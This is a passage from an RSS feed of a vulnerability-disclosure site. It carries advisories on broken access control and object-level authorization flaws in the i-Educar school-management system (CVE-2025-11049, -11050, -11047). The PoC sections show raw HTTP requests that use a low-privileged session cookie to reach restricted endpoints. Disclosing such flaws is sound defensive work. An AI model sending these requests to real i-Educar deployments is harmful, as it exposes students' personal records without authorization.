&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /unificacao-aluno HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_consulta_movimento_mensal_lst.php?ano=2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_instituicao=1&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_escola=4&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_curso=3&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_serie=&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_turma=&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;data_inicial=01%2F08%2F2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;data_final=31%2F08%2F2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;modalidade=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that we have access to the page and to the function. And, this user, should not do that.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11049/image-2.png&amp;#34;
	width=&amp;#34;1585&amp;#34;
	height=&amp;#34;666&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11049/image-2_hu_65700f12f8b3e361.png 480w, /p/cve-2025-11049/image-2_hu_385fd793852dde6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;237&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 27 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11050</title>
        <link>https://www.cvehunters.com/p/cve-2025-11050/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-11050/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11050-broken-access-control-in-periodo-lancamento-endpoint&amp;#34;&amp;gt;CVE-2025-11050: Broken Access Control in &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /periodo-lancamento&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11050-broken-access-control-in-periodo-lancamento-endpoint&amp;#34;&amp;gt;CVE-2025-11050: Broken Access Control in &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11050&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/periodo-lancamento&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /periodo-lancamento&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11050/image.png&amp;#34;
	width=&amp;#34;1603&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11050/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11050/image_hu_7e1e16197ca84d77.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11050/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11050/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11050/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /periodo-lancamento HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that we have access to the page and to the function. And, this user, should not do that.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11050/image-2.png&amp;#34;
	width=&amp;#34;967&amp;#34;
	height=&amp;#34;657&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11050/image-2_hu_c45211c19b719ad8.png 480w, /p/cve-2025-11050/image-2_hu_b631283a84602958.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;147&amp;#34;
		data-flex-basis=&amp;#34;353px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 27 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11047</title>
        <link>https://www.cvehunters.com/p/cve-2025-11047/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-11047/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11047-broken-object-level-authorization-bola-allows-enumeration-of-student-records-via-moduleapialuno&amp;#34;&amp;gt;CVE-2025-11047: Broken Object Level Authorization (BOLA) allows enumeration of student records via &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt; endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (&amp;lt;b&amp;gt;matriculas&amp;lt;/b&amp;gt;) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11047-broken-object-level-authorization-bola-allows-enumeration-of-student-records-via-moduleapialuno&amp;#34;&amp;gt;CVE-2025-11047: Broken Object Level Authorization (BOLA) allows enumeration of student records via &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt; endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (&amp;lt;b&amp;gt;matriculas&amp;lt;/b&amp;gt;) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
